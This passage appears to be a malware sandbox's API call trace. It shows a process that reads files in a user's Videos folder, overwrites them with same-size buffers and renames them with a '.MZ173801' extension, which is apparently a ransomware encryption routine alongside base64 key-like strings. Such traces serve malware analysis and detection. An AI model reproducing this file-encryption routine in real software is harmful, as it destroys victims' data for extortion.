lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.243] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.244] GetCurrentThreadId () returned 0x1358 [0119.244] GetCurrentThreadId () returned 0x1358 [0119.244] GetCurrentThreadId () returned 0x1358 [0119.244] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.244] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.245] GetCurrentThreadId () returned 0x1358 [0119.245] GetCurrentThreadId () returned 0x1358 [0119.245] GetCurrentThreadId () returned 0x1358 [0119.245] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\OhqnbvOqqEhHEL-.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ohqnbvoqqehhel-.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0119.245] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0119.245] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0119.245] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xaa6a [0119.245] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0119.245] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xaa6a, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xaa6a, lpOverlapped=0x0) returned 1 [0119.246] CloseHandle (hObject=0x3fc) returned 1 [0119.247] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\OhqnbvOqqEhHEL-.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ohqnbvoqqehhel-.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0119.249] WriteFile (in: hFile=0x3fc, lpBuffer=0x243db60*, nNumberOfBytesToWrite=0xaa6a, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243db60*, lpNumberOfBytesWritten=0x19f9bc*=0xaa6a, lpOverlapped=0x0) returned 1 [0119.250] CloseHandle (hObject=0x3fc) returned 1 [0119.252] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\OhqnbvOqqEhHEL-.swf" (normalized: "c:\\users\\fd1hvy\\videos\\ohqnbvoqqehhel-.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\OhqnbvOqqEhHEL-.swf.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\ohqnbvoqqehhel-.swf.mz173801")) returned 1 [0119.253] GetCurrentThreadId () returned 0x1358 [0119.253] GetCurrentThreadId () returned 0x1358 [0119.253] GetCurrentThreadId () returned 0x1358 [0119.253] GetCurrentThreadId () returned 0x1358 [0119.253] GetCurrentThreadId () returned 0x1358 [0119.253] GetCurrentThreadId () returned 0x1358 [0119.253] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2183e80, ftCreationTime.dwHighDateTime=0x1d5e83a, ftLastAccessTime.dwLowDateTime=0xe1e1fc00, ftLastAccessTime.dwHighDateTime=0x1d5e320, ftLastWriteTime.dwLowDateTime=0xe1e1fc00, ftLastWriteTime.dwHighDateTime=0x1d5e320, nFileSizeHigh=0x0, nFileSizeLow=0x186da, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="PuYC77t.avi", cAlternateFileName="")) returned 1 [0119.253] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0119.253] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0119.253] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\PuYC77t.avi" (normalized: "c:\\users\\fd1hvy\\videos\\puyc77t.avi"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2183e80, ftCreationTime.dwHighDateTime=0x1d5e83a, ftLastAccessTime.dwLowDateTime=0xe1e1fc00, ftLastAccessTime.dwHighDateTime=0x1d5e320, ftLastWriteTime.dwLowDateTime=0xe1e1fc00, ftLastWriteTime.dwHighDateTime=0x1d5e320, nFileSizeHigh=0x0, nFileSizeLow=0x186da)) returned 1 [0119.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.254] GetCurrentThreadId () returned 0x1358 [0119.254] GetCurrentThreadId () returned 0x1358 [0119.255] GetCurrentThreadId () returned 0x1358 [0119.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.255] GetCurrentThreadId () returned 0x1358 [0119.255] GetCurrentThreadId () returned 0x1358 [0119.255] GetCurrentThreadId () returned 0x1358 [0119.256] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PuYC77t.avi" (normalized: "c:\\users\\fd1hvy\\videos\\puyc77t.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0119.256] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0119.256] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0119.256] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x186da [0119.256] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0119.256] ReadFile (in: hFile=0x3fc, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x186da, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f9b0*=0x186da, lpOverlapped=0x0) returned 1 [0119.257] CloseHandle (hObject=0x3fc) returned 1 [0119.259] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PuYC77t.avi" (normalized: "c:\\users\\fd1hvy\\videos\\puyc77t.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0119.261] WriteFile (in: hFile=0x3fc, lpBuffer=0x23be7d0*, nNumberOfBytesToWrite=0x186da, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23be7d0*, lpNumberOfBytesWritten=0x19f9bc*=0x186da, lpOverlapped=0x0) returned 1 [0119.263] CloseHandle (hObject=0x3fc) returned 1 [0119.266] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\PuYC77t.avi" (normalized: "c:\\users\\fd1hvy\\videos\\puyc77t.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\PuYC77t.avi.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\puyc77t.avi.mz173801")) returned 1 [0119.267] GetCurrentThreadId () returned 0x1358 [0119.267] GetCurrentThreadId () returned 0x1358 [0119.267] GetCurrentThreadId () returned 0x1358 [0119.267] 